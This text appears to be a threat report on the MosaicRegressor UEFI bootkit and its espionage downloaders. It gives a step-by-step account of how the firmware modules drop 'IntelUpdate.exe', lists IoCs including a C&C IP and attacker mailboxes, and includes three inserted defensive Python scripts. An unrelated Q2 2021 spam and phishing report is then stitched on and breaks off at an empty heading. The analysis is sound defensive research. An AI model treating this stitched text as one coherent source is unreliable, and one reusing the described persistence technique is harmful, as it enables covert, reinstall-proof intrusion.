Moreover, since it is typically shipped within SPI flash storage that is soldered to the computer's motherboard, such implanted malware will be resistant to OS reinstallation or replacement of the hard drive. \nThis type of attack has occurred in several instances in the past few years. A prominent example is the LoJax implant [discovered](<https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/>) by our friends at ESET in 2018, in which patched UEFI modules of the LoJack anti-theft software (also known as Computrace) were used to deploy a malicious user mode agent in a number of Sofacy \\ Fancy Bear victim machines. The dangers of Computrace itself [were described](<https://securelist.com/absolute-computrace-revisited/58278/>) by our colleagues from the Global Research and Analysis Team (GReAT) back in 2014.\n\nAnother example is the source code of a UEFI bootkit named VectorEDK which was discovered in the Hacking Team leaks from 2015. This code consisted of a set of UEFI modules that could be incorporated into the platform firmware in order to have it deploy a backdoor to the system that will run when the OS loads, or redeploy it if it was wiped. Despite the fact that VectorEDK's code was made public and [can be found](<https://github.com/hackedteam/vector-edk>) on GitHub nowadays, we hadn't witnessed actual evidence of it in the wild before our latest finding.\n\n## Our Discovery\n\nDuring an investigation, we came across several suspicious UEFI firmware images. A deeper inspection revealed that they contained four components that had an unusual proximity in their assigned GUID values: two DXE drivers and two UEFI applications. 
After further analysis we were able to determine that they were based on the leaked source code of HackingTeam's VectorEDK bootkit, with minor customizations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141821/sl_MosaicRegressor_01.png>)\n\n**_Rogue components found within the compromised UEFI firmware_**\n\nThe goal of these added modules is to invoke a chain of events that would result in writing a malicious executable named 'IntelUpdate.exe' to the victim's Startup folder. Thus, when Windows is started the written malware would be invoked as well. Apart from that, the modules would ensure that if the malware file is removed from the disk, it will be rewritten. Since this logic is executed from the SPI flash, there is no way to avoid this process other than eliminating the malicious firmware.\n\nFollowing is an outline of the components that we revealed:\n\n * **SmmInterfaceBase**: a DXE driver that is based on Hacking Team's 'rkloader' component and intended to deploy further components of the bootkit for later execution. This is done by registering a callback that will be invoked upon an event of type EFI_EVENT_GROUP_READY_TO_BOOT. The event occurs at a point when control can be passed to the operating system's bootloader, effectively allowing the callback to take effect before it. The callback will in turn load and invoke the 'SmmAccessSub' component.\n * **Ntfs**: a driver written by Hacking Team that is used to detect and parse the NTFS file system in order to allow conducting file and directory operations on the disk.\n * **SmmReset**: a UEFI application intended to mark the firmware image as infected. This is done by setting the value of a variable named 'fTA' to a hard-coded GUID. 
The application is based on a component from the original Vector-EDK code base that is named 'ReSetfTA'.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141941/sl_MosaicRegressor_02.png>)\n\n**_ __Setting of the fTA variable with a predefined GUID to mark the execution of the bootkit_**\n\n * **SmmAccessSub: **the main bootkit component that serves as a persistent dropper for a user-mode malware. It is executed by the callback registered during the execution of 'SmmInterfaceBase', and takes care of writing a binary embedded within it as a file named 'IntelUpdate.exe' to the startup directory on disk. This allows the binary to execute when Windows is up and running. \nThis is the only proprietary component amongst the ones we inspected, which was mostly written from scratch and makes only slight use of code from a Vector-EDK application named 'fsbg'. It conducts the following actions to drop the intended file to disk:\n\n * Bootstraps pointers for the SystemTable, BootServices and RuntimeServices global structures.\n * Tries to get a handle to the currently loaded image by invoking the HandleProtocol method with the EFI_LOADED_IMAGE_PROTOCOL_GUID argument.\n * If the handle to the current image is obtained, the module attempts to find the root drive in which Windows is installed by enumerating all drives and checking that the '\\Windows\\System32' directory exists on them. A global EFI_FILE_PROTOCOL object that corresponds to the drive will be created at this point and referenced to open any further directories or files in this drive.\n * If the root drive is found in the previous stage, the module looks for a marker file named 'setupinf.log' under the Windows directory and proceeds only if it doesn't exist. 
In the absence of this file, it is created.\n * If the creation of 'setupinf.log' succeeds, the module goes on to check if the 'Users' directory exists under the same drive.\n * If the 'Users' directory exists, it writes the 'IntelUpdate.exe' file (embedded in the UEFI application's binary) under the 'ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup' directory in the root drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142051/sl_MosaicRegressor_03.png>)\n\n**_Code from 'SmmAccessSub' used to write the embedded 'IntelUpdate.exe' binary to the Windows Startup directory_**\n\nUnfortunately, we were not able to determine the exact infection vector that allowed the attackers to overwrite the original UEFI firmware. Our detection logs show that the firmware itself was found to be malicious, but no suspicious events preceded it. Due to this, we can only speculate how the infection could have happened.\n\nOne option is through physical access to the victim's machine. This could be partially based on Hacking Team's leaked material, according to which the installation of firmware infected with VectorEDK requires booting the target machine from a USB key. Such a USB would contain a special update utility that can be generated with a designated builder provided by the company. We found a Q-flash update utility in our inspected firmware, which could have been used for such a purpose as well.\n\nFurthermore, the leaks reveal that the UEFI infection capability (which is referred to by Hacking Team as 'persistent installation') was tested on ASUS X550C laptops. These make use of UEFI firmware by AMI which is very similar to the one we inspected. 
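The drop logic outlined above leaves characteristic file and variable names inside the modules, which is something a defender with a firmware dump can check for. The following Python script is an added example, not part of the original report and not Kaspersky's Firmware Scanner: it searches a raw SPI flash image for those names in both ASCII and the 16-bit little-endian form of UEFI CHAR16 strings; the encodings tried, the NUL-terminator requirement and the two-string threshold are assumptions of the example, and the sample image is constructed.

```python
"""Search a raw SPI flash / UEFI firmware dump for the file and variable names
the MosaicRegressor bootkit components use. Added example, not Kaspersky's
Firmware Scanner and not code from the report."""
from __future__ import annotations

from dataclasses import dataclass

# Names taken from the component outline above. The report does not say how
# each is encoded inside the modules, so both ASCII and the 16-bit
# little-endian form of UEFI CHAR16 strings are tried (an assumption here).
BOOTKIT_STRINGS = (
    "IntelUpdate.exe",
    "setupinf.log",
    "\\Windows\\System32",
    "\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup",
    "fTA",
)
ENCODINGS = ("ascii", "utf-16-le")


@dataclass(frozen=True)
class Hit:
    offset: int
    text: str
    encoding: str


def find_all(haystack: bytes, needle: bytes) -> list[int]:
    """Every offset at which needle occurs in haystack."""
    offsets, pos = [], haystack.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = haystack.find(needle, pos + 1)
    return offsets


def scan_image(image: bytes, strings=BOOTKIT_STRINGS) -> list[Hit]:
    """Report each indicator string found in the image, in each encoding."""
    hits: list[Hit] = []
    for text in strings:
        for enc in ENCODINGS:
            # Require the NUL terminator a C/CHAR16 string literal carries, so
            # a short name such as 'fTA' does not match random bytes.
            terminator = b"\x00\x00" if enc == "utf-16-le" else b"\x00"
            needle = text.encode(enc) + terminator
            hits.extend(Hit(off, text, enc) for off in find_all(image, needle))
    return sorted(hits, key=lambda h: h.offset)


def verdict(hits: list[Hit]) -> str:
    """'suspect' when two or more distinct bootkit names appear (threshold is
    this example's choice), otherwise 'clean'."""
    return "suspect" if len({h.text for h in hits}) >= 2 else "clean"


def scan_file(path: str) -> tuple[str, list[Hit]]:
    """Scan a firmware dump on disk, e.g. one read out with a SPI programmer."""
    with open(path, "rb") as fh:
        hits = scan_image(fh.read())
    return verdict(hits), hits


# Constructed sample image: filler bytes with two names planted as
# NUL-terminated UTF-16LE strings, the way an EFI module stores file paths.
SAMPLE_IMAGE = (
    bytes(range(256)) * 4
    + "setupinf.log".encode("utf-16-le") + b"\x00\x00"
    + bytes(range(256))
    + "IntelUpdate.exe".encode("utf-16-le") + b"\x00\x00"
    + b"\xff" * 64
)

if __name__ == "__main__":
    found = scan_image(SAMPLE_IMAGE)
    for h in found:
        print(f"0x{h.offset:08x}  {h.encoding:10}  {h.text}")
    print("verdict:", verdict(found))
```

A string match is a lead, not proof: confirm by extracting the modules with a UEFI parser and comparing them against the vendor's clean image for that board.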
Given that similarity, we can assume that Hacking Team's method of patching the firmware would work in our case as well.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142215/sl_MosaicRegressor_04.png>)

**_Excerpt from a Hacking Team manual for deployment of infected UEFI firmware, also known as 'persistent installation'_**

Of course, we cannot exclude other possibilities whereby rogue firmware was pushed remotely, perhaps through a compromised update mechanism. Such a scenario would typically require exploiting vulnerabilities in the BIOS update authentication process. While this could be the case, we don't have any evidence to support it.

## The Bigger Picture: Enter MosaicRegressor Framework

While Hacking Team's original bootkit was used to write one of the company's backdoors to disk, known as 'Soldier', 'Scout' or 'Elite', the UEFI implant we investigated deployed a new piece of malware that we had not seen before. We decided to look for similar samples that share strings and implementation traits with the dropped binary. The samples that we found suggested that the dropped malware was only one variant derived from a wider framework, which we named MosaicRegressor.

MosaicRegressor is a multi-stage and modular framework aimed at espionage and data gathering. It consists of downloaders, and occasionally multiple intermediate loaders, that are intended to fetch and execute payloads on victim machines. The fact that the framework consists of multiple modules helps the attackers conceal the wider framework from analysis and deploy components to target machines only on demand. Indeed, we were able to obtain only a handful of payload components during our investigation.

The downloader components of MosaicRegressor share common business logic, whereby the implants contact a C&C, download further DLLs from it and then load and invoke specific export functions from them.
The execution of the downloaded modules usually results in output that can in turn be sent back to the C&C.

Having said that, the various downloaders we observed made use of different communication mechanisms when contacting their C&Cs:

 * CURL library (HTTP/HTTPS)
 * BITS transfer interface
 * WinHTTP API
 * POP3S/SMTPS/IMAPS, payloads transferred in e-mail messages

The last variant in the list, which we call MailReg, is distinct for its use of e-mail boxes to host the requested payload. The payload this implant runs can also produce output upon invocation, which is later forwarded to a 'feedback' mail address, where it is likely collected by the attackers.

The mailboxes used for this purpose reside on the 'mail.ru' domain and are accessed using credentials that are hard-coded in the malware's binary. To fetch the requested file from the target inbox, MailReg enters an infinite loop in which it tries to connect to the "pop.mail.ru" server every 20 minutes, and makes use of the first pair of credentials that allows a successful connection. The e-mails used for login (without their passwords) and the corresponding feedback mail are specified in the table below:

**Login mail** | **Feedback mail**
---|---
thtgoolnc@mail.ru | thgetmmun@mail.ru
thbububugyhb85@mail.ru | thyhujubnmtt67@mail.ru

The downloaders can also be split into two distinct types: the "plain" one just fetching the payload, and the "extended" version that also collects system information:

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142407/sl_MosaicRegressor_05.png>)

**_Structure of the log file written by BitsRegEx; strings marked in red are the original fields that appear in that file_**

We were able to obtain only one variant of the subsequent stage, which installs itself in the autorun registry values and acts as another loader for the components that are supposed to be fetched by the initial downloader.
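The MailReg polling behaviour described above, a POP3S connection to pop.mail.ru every 20 minutes, is a periodicity a network defender can hunt for in connection logs. The following Python script is an added example, not part of the original report: it runs that check over constructed connection-log lines; the log format, the 90-second tolerance and the other thresholds are assumptions of the example.

```python
"""Hunt for the MailReg polling pattern described above: a host opening POP3S
sessions to pop.mail.ru roughly every 20 minutes. Added example, not the
report's tooling; the log format below is constructed for illustration."""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Constructed firewall/proxy export format: one connection per line.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) "
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)"
)


def parse_line(line):
    """Return (timestamp, src, dst, dport), or None for lines that don't match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m["src"], m["dst"], int(m["dport"])


def find_periodic_beacons(lines, dst="pop.mail.ru", dport=995,
                          period_s=20 * 60, tolerance_s=90,
                          min_hits=4, min_regular=0.8):
    """Map src -> median gap in seconds for hosts whose connections to
    dst:dport recur at about period_s. A host qualifies when it has at least
    min_hits connections, the median gap is within tolerance_s of the period
    and at least min_regular of the gaps are too (thresholds are this
    example's choice)."""
    times_by_src = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == dst and rec[3] == dport:
            times_by_src[rec[1]].append(rec[0])

    beacons = {}
    for src, times in times_by_src.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds()
                for earlier, later in zip(times, times[1:])]
        median = statistics.median(gaps)
        regular = sum(abs(g - period_s) <= tolerance_s for g in gaps) / len(gaps)
        if abs(median - period_s) <= tolerance_s and regular >= min_regular:
            beacons[src] = median
    return beacons


# Constructed sample: 10.0.0.5 polls every ~20 minutes, 10.0.0.9 is a person
# checking mail irregularly, 10.0.0.7 polls regularly but too few times, and
# one line is malformed.
SAMPLE_LOG = """\
2020-05-04T08:00:02Z src=10.0.0.5 dst=pop.mail.ru dport=995 action=allow
2020-05-04T08:03:10Z src=10.0.0.9 dst=pop.mail.ru dport=995 action=allow
2020-05-04T08:05:44Z src=10.0.0.9 dst=pop.mail.ru dport=995 action=allow
2020-05-04T08:10:00Z src=10.0.0.5 dst=update.example.net dport=443 action=allow
2020-05-04T08:20:05Z src=10.0.0.5 dst=pop.mail.ru dport=995 action=allow
2020-05-04T08:40:01Z src=10.0.0.5 dst=pop.mail.ru dport=995 action=allow
this line is malformed and must be skipped
2020-05-04T09:00:07Z src=10.0.0.5 dst=pop.mail.ru dport=995 action=allow
2020-05-04T09:00:10Z src=10.0.0.7 dst=pop.mail.ru dport=995 action=allow
2020-05-04T09:20:03Z src=10.0.0.5 dst=pop.mail.ru dport=995 action=allow
2020-05-04T09:20:12Z src=10.0.0.7 dst=pop.mail.ru dport=995 action=allow
2020-05-04T09:30:00Z src=10.0.0.9 dst=pop.mail.ru dport=995 action=allow
2020-05-04T09:40:09Z src=10.0.0.7 dst=pop.mail.ru dport=995 action=allow
2020-05-04T11:12:09Z src=10.0.0.9 dst=pop.mail.ru dport=995 action=allow
""".splitlines()

if __name__ == "__main__":
    for src, gap in find_periodic_beacons(SAMPLE_LOG).items():
        print(f"{src}: POP3S to pop.mail.ru every ~{gap / 60:.1f} min")
```

Legitimate mail clients also poll on fixed intervals, so a hit is a lead to correlate with the owning process and the account used, not a verdict on its own.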
The components fetched by the initial downloader are also just intermediate loaders for the next-stage DLLs. Ultimately, there is no concrete business logic in the persistent components, as it is provided by the C&C server in the form of DLL files, most of them temporary.

We have observed one such library, "**load.rem**", which is a basic document stealer, fetching files from the "Recent Documents" directory and archiving them with a password, likely as a preliminary step before the result is exfiltrated to the C&C by another component.

The following figure describes the full flow and the connections between the components that we know about. The colored elements are the components that we obtained and the gray ones are those we didn't:

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142517/sl_MosaicRegressor_06.png>)

**_Flow from BitsRegEx to execution of intermediate loaders and final payload_**

## Who were the Targets?

According to our telemetry, there were several dozen victims who received components from the MosaicRegressor framework between 2017 and 2019. These victims included diplomatic entities and NGOs in Africa, Asia and Europe. Only two of them were also infected with the UEFI bootkit in 2019, predating the deployment of the BitsReg component.

Based on the affiliation of the discovered victims, we could determine that all had some connection to the DPRK, be it non-profit activity related to the country or actual presence within it. This common theme is reinforced by one of the infection vectors used to deliver the malware to some of the victims: SFX archives pretending to be documents discussing various subjects related to North Korea. Those were bundled with both an actual document and MosaicRegressor variants, both of which are executed when the archive is opened. Examples of the lure documents can be seen below.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142633/sl_MosaicRegressor_07.png>)

_**Examples of lure documents bundled into malicious SFX archives sent to MosaicRegressor victims, discussing DPRK related topics**_

## Who is behind the attack?

When analyzing MosaicRegressor's variants, we noticed several interesting artefacts that provided us with clues to the identity of the actor behind the framework. As far as we can tell, the attacks were conducted by a Chinese-speaking actor, who may have previously used the Winnti backdoor. We found the following evidence to support this:

 * We spotted many strings used in the system information log generated by the BitsRegEx variant that contain the byte sequence 0xA3, 0xBA. This is an invalid sequence for a UTF-8 string, and the LATIN1 encoding translates these bytes to a pound sign followed by a "masculine ordinal indicator" ("£º"). An attempt to iterate over all available iconv symbol tables, trying to convert the sequence to UTF-8, produces candidates that give a more meaningful interpretation. Given the context of the string preceding the sequence and the line feed symbols following it, the best match is the "FULL-WIDTH COLON" Unicode character translated from either the Chinese or Korean code pages (i.e. CP936 and CP949).

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142816/sl_MosaicRegressor_08.png>)

_Figure_: The BitsRegEx system information log making use of the byte sequence 0xA3, 0xBA, likely used to represent a full-width colon according to code pages CP936 and CP949.

 * Another artefact was a file resource in CurlReg samples that contained a language identifier set to 2052 ("zh-CN").

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142900/sl_MosaicRegressor_09.png>)

**_Chinese language artefact in the resource section of a CurlReg sample_**

 * We detected an OLE2 object taken out of a document weaponized with the CVE-2018-0802 vulnerability, which was produced by the so-called 'Royal Road' / '8.t' document builder and used to drop a CurlReg variant. To the best of our knowledge, this builder is commonly used by Chinese-speaking threat actors.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142954/sl_MosaicRegressor_10.png>)

**_Excerpt from the OLE2 object found within a 'Royal Road' weaponized document, delivering the CurlReg variant_**

 * A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor's variants (MD5: 3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the 'Winnti umbrella and linked groups', according to a publicly available [report](<https://401trg.com/burning-umbrella/>). Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that this group is indeed responsible for the attacks.

## Conclusion

The attacks described in this blog post demonstrate the lengths an actor will go to in order to gain the highest level of persistence on a victim machine.
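The code-page reasoning from the attribution section above can be reproduced directly. The following Python script is an added example, not the report's tooling: it decodes the byte pair 0xA3 0xBA under a set of candidate code pages (this example's own stand-in for the iconv table sweep the text describes) and then parses a constructed log in the "key, separator, value" layout, with only the separator bytes taken from the report.

```python
"""Reproduce the code-page reasoning from the attribution section above:
the byte pair 0xA3 0xBA is invalid UTF-8, reads as '£º' in Latin-1, and
decodes to FULL-WIDTH COLON (U+FF1A) under the Chinese (CP936) and Korean
(CP949) code pages. Added example, not the report's tooling."""

SEQUENCE = b"\xa3\xba"
FULLWIDTH_COLON = "\uff1a"

# Candidate code pages to sweep (this example's own selection, standing in
# for "all available iconv symbol tables").
CANDIDATES = ("utf-8", "latin-1", "cp1252", "cp1251", "koi8_r",
              "cp936", "cp949", "cp950", "euc_jp", "shift_jis")


def decode_candidates(data, names=CANDIDATES):
    """Map codec name -> decoded text, or None if the bytes are invalid in it."""
    result = {}
    for name in names:
        try:
            result[name] = data.decode(name)
        except UnicodeDecodeError:
            result[name] = None
    return result


def codecs_yielding(data, target, names=CANDIDATES):
    """Codecs under which data decodes exactly to target."""
    return [name for name, text in decode_candidates(data, names).items()
            if text == target]


def parse_log(raw, codepage="cp936"):
    """Decode a 'key<A3 BA>value' log with the chosen code page and split each
    line at the full-width colon the sequence becomes. Lines without the
    separator are ignored. The layout is constructed; only the separator
    bytes come from the report."""
    fields = {}
    for line in raw.decode(codepage, errors="replace").splitlines():
        if FULLWIDTH_COLON in line:
            key, value = line.split(FULLWIDTH_COLON, 1)
            fields[key.strip()] = value.strip()
    return fields


# Constructed sample of the log layout, not bytes from a real sample.
SAMPLE_LOG = b"OS\xa3\xbaWindows 7\nUser\xa3\xbaanalyst\nNo separator here\n"

if __name__ == "__main__":
    for name, text in decode_candidates(SEQUENCE).items():
        shown = "invalid" if text is None else " ".join(f"U+{ord(c):04X}" for c in text)
        print(f"{name:10} {shown}")
    print("full-width colon under:", codecs_yielding(SEQUENCE, FULLWIDTH_COLON))
    print(parse_log(SAMPLE_LOG))
```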
It is highly uncommon to see compromised UEFI firmware in the wild, usually due to the low visibility into attacks on firmware, the advanced measures required to deploy it on a target's SPI flash chip, and the high stakes of burning a sensitive toolset or assets when doing so.

With this in mind, we see that UEFI continues to be a point of interest to APT actors, while still being largely overlooked by security vendors. The combination of our technology and our understanding of current and past campaigns leveraging infected firmware helps us monitor and report on future attacks against such targets.

The full details of this research, as well as future updates on the underlying threat actor, are available to customers of the APT reporting service through our Threat Intelligence Portal.

## IoCs

The following IoC list is not complete. If you want more information about the APT discussed here, a full IoC list and YARA rules are available to customers of Kaspersky Threat Intelligence Reports.
Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)

**UEFI Modules**

F5B320F7E87CC6F9D02E28350BB87DE6 (SmmInterfaceBase)  
0C136186858FD36080A7066657DE81F5 (SmmAccessSub)  
91A473D3711C28C3C563284DFAFE926B (SmmReset)  
DD8D3718197A10097CD72A94ED223238 (Ntfs)
_Originally published on securelist as "MosaicRegressor: Lurking in the Shadows of UEFI", 2020-10-05: https://securelist.com/mosaicregressor/98849/_

## Quarterly highlights

### The corporate sector

In Q2 2021, corporate accounts continued to be one of the most tempting targets for cybercriminals. To add to the credibility of links in emails, scammers imitated mailings from popular cloud services. This technique has been used many times before. A fake notification about a Microsoft Teams meeting or a request to view an important document traditionally takes the victim to a phishing login page asking for corporate account credentials.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142238/Spam_and_phishing_in_Q2_2021_01.png>)

Cybercriminals also faked emails from cloud services in schemes aimed at stealing not accounts but money. We saw, for example, spoofed messages about a comment added to a document stored in the cloud. The document itself most likely did not exist: at the other end of the link was the usual recipe for making a fast buck online by investing in Bitcoin or a similarly tempting offer.
Such "offers" usually require the victim to pay a small amount upfront to claim their non-existent reward.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142307/Spam_and_phishing_in_Q2_2021_02.png>)

In addition to various cloud-related emails, we blocked messages disguised as business correspondence and containing links to malware. In particular, an email threatening legal action claimed that the victim had not paid for a completed order. To resolve the issue amicably, the recipient was asked to review the documents confirming the order completion and to settle the bill by a certain date. The documents were supposedly available via the link provided and protected by a special code. In fact, the file named "Договор №8883987726 от 10.10.2021.pdf.exe" (Agreement #8883987726 of 10.10.2021.pdf.exe) that the victim was asked to download was a malicious program known as Backdoor.Win32.RWS.a.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142335/Spam_and_phishing_in_Q2_2021_03.png>)

### COVID-19 compensation fraud

In Q2 2021, scammers continued to exploit the theme of pandemic-related compensation. This time, offers of financial assistance were mostly sent in the name of government agencies. "The UK Government" and "the US Department of the Treasury" were ready to pay out special grants to all-comers. However, attempts to claim the promised handout only led to monetary loss or compromised bank card details. It goes without saying that the grants did not materialize.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142357/Spam_and_phishing_in_Q2_2021_04.png>)

It was bank card details, including CVV codes, that were the target of a gang of cybercriminals who created a fake informational website about social assistance for citizens of Belarus. To make the pages look official, the scammers described in detail the system of payouts depending on the applicant's line of work and other conditions. The information bulletin issued in the name of the Belarus Ministry of Health clearly spelled out the payment amounts for medical staff. Workers in other fields were invited to calculate their entitled payout by clicking the Get Social Assistance button. This redirected the visitor to a page with a form for entering bank card details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142425/Spam_and_phishing_in_Q2_2021_05.png>)

### Parcel scam: buy one, get none

Unexpected parcels requiring payment by the recipient remained one of the most common tricks this past quarter. Moreover, cybercriminals became more adept at localizing their notifications: Q2 saw a surge in mass mailings in a range of languages. The reason for the invoice from the "mail company" could be anything from customs duties to shipment costs. When trying to pay for the service, as with compensation fraud, victims were taken to a fake website, where they risked not only losing the amount itself (which could be far higher than specified in the email), but also spilling their bank card details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142509/Spam_and_phishing_in_Q2_2021_06.png>)

Mailed items were the focus of one other fraudulent scheme. Websites appeared offering people the chance to buy out others' parcels that for some reason could not reach the intended recipients. The "service" was positioned as a lottery: the buyer paid only for the weight of the parcel (the bigger it was, the higher the price), and its contents were not disclosed. To find out what was inside, the lucky owner of the abandoned parcel had to wait for it to arrive at the specified address. Which it didn't. According to the mail company Russian Post, when the storage period expires, registered items (parcels, letters, postcards, EMS items) are sent to the return address at the sender's expense. If the sender does not collect the returned item within the storage period, it is considered "unclaimed" and stored for a further six months, after which it is destroyed. In other words, ownerless parcels are not sold. Therefore, any offer to buy them is evidently a scam.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142815/Spam_and_phishing_in_Q2_2021_07.png>)

### New movies: pay for the pleasure of not watching

Late April saw the annual Oscars ceremony in Hollywood. Movies nominated for an Academy Award naturally attract public as well as cybercriminal attention. As a consequence, fake websites popped up offering free viewings and even downloads of Oscar contenders. After launching a video, the visitor to the illegal movie theater was shown several clips of the film (usually taken from the official trailer), before being asked to pay a small subscription fee to continue watching. However, after payment of the "subscription" the movie screening did not resume; instead, the attackers had a new bank account to play with.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142842/Spam_and_phishing_in_Q2_2021_08.png>)

In fact, almost any big-budget movie is accompanied by the appearance of fake websites offering video or audio content long before its official release. Kaspersky found fake sites supposedly hosting _Friends: The Reunion_, a special episode of the popular sitcom. Fans who tried to watch or download the long-awaited continuation were redirected to a Columbia Pictures splash screen. After a few seconds, the broadcast stopped, replaced by a request to pay a nominal fee.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03142917/Spam_and_phishing_in_Q2_2021_09.png>)

### Messenger spam: WhatsApp with that?

In messenger-based spam, we continued to observe common tricks to get users to part with a small amount of money. Victims were asked, for example, to take a short survey about WhatsApp and to send messages to several contacts in order to receive a prize. Another traditional scam aims to persuade the user that they are the lucky winner of a tidy sum. Both scenarios end the same way: the scammers promise a large payout, but only after receiving a small commission.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143055/Spam_and_phishing_in_Q2_2021_10.png>)

WhatsApp was bought by Facebook in 2014. In early 2021, the two companies' symbiotic relationship became a hot topic in connection with [WhatsApp's new privacy policy](<https://www.wired.com/story/whatsapp-facebook-data-share-notification/>), allowing the messenger to exchange user information with its parent company. Cybercriminals took advantage of the rumor mill about the two companies. They set up fake websites inviting users to a WhatsApp chat with "beautiful strangers". But when attempting to enter the chat room, the potential victim landed on a fake Facebook login page.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143123/Spam_and_phishing_in_Q2_2021_11.png>)

Emails with a link pointing to a fake WhatsApp voice message most likely belong to the same category.
By following it, the recipient risks not only handing over their personal data to the attackers, but also downloading malware to their computer or phone.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143142/Spam_and_phishing_in_Q2_2021_12.png>)

### Investments and public property scams

Offers of quick earnings with minimal effort remain one of the most common types of fraud. In Q2 2021, cybercriminals diversified their easy-money schemes. Email recipients were invited to invest in natural resources (oil, gas, etc.) or cryptocurrency secured by these resources. The topic of gas also surfaced in more conventional compensation scams. To make their offers more credible, cybercriminals used the brands of large companies. Having accepted investments, the scammers and their sites quickly disappeared along with the victims' money.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143159/Spam_and_phishing_in_Q2_2021_13.png>)

For more suspicious minds, the cybercriminals set up a fake Gazprom anti-fraud website, where they posed as company employees promising to compensate victims' losses. The cybercriminals claimed that those who had paid more than 60,000 rubles were entitled to compensation; however, the attacks were not targeted. Most likely, the scammers were counting on users being curious about whether they could claim compensation. Naturally, the help of the "anti-fraudsters" was not without strings attached, despite the advertised free consultation. "Clients" who filled out the form were asked to pay a small fee for the refund, whereupon the "consultants" vanished without compensating so much as a dime.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143221/Spam_and_phishing_in_Q2_2021_14.png>)

Another high-earning scam cited client payouts under VTB Invest, VTB Bank's digital asset management solution. Using the bank's logos, the fraudsters offered "active banking users" the opportunity to receive a "payout from investors". After filling out the application form, indicating name, phone number and email, the potential victim saw a message stating that they were to receive a certain amount of money. Although the cybercriminals assured that no commission was payable, to receive the "payout" the applicant was required to provide bank card details or deposit a small sum, ostensibly to verify the account. In other words, it was the usual scheme in a different wrapper.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03143316/Spam_and_phishing_in_Q2_2021_15.png>)

## Statistics: spam

### Proportion of spam in mail traffic

After a prolonged decline, the share of spam in global mail traffic began to grow again in Q2 2021, averaging 46.56%, up 0.89 p.p. against the previous reporting period.

_Share of spam in global mail traffic, Q1 and Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144632/01-en-spam-report-q2-2021.png>))_

A look at the data by month shows that, having troughed in March (45.10%), the share of spam in global mail traffic rose slightly in April (45.29%), with further jumps in May (46.35%) and June (48.03%), which is comparable to Q4 2020.

### Source of spam by country

The TOP 10 spam-source countries remained virtually unchanged from the first quarter. Russia (26.07%) is still in first place, its share having increased by 3.6 p.p., followed by Germany (13.97%) and the US (11.24%), whose contributions to the global flow of spam decreased slightly. China (7.78%) remains in fourth position.

_Source of spam by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144703/03-en-spam-report-q2-2021.png>))_

The Netherlands (4.52%), France (3.48%) and Spain (2.98%) held on to fifth, sixth and seventh place, respectively. Only the last three positions in the TOP 10 experienced a slight reshuffle: Poland (1.69%) dropped out of the ranking, falling to 11th place, while Japan (2.53%) moved up to eighth. Brazil (2.27%) remained in ninth spot, while the last line in the ranking was claimed by India (1.70%).

### Malicious mail attachments

Mail Anti-Virus blocked 34,224,215 malicious attachments in Q2, almost 4 million fewer than in the first three months of 2021.

_Number of Mail Anti-Virus triggerings, Q1 and Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144738/04-en-spam-report-q2-2021.png>))_

Peak malicious activity came in June, when Kaspersky solutions blocked more than 12 million attachments, while May was the quietest, with only 10.4 million.

#### Malware families

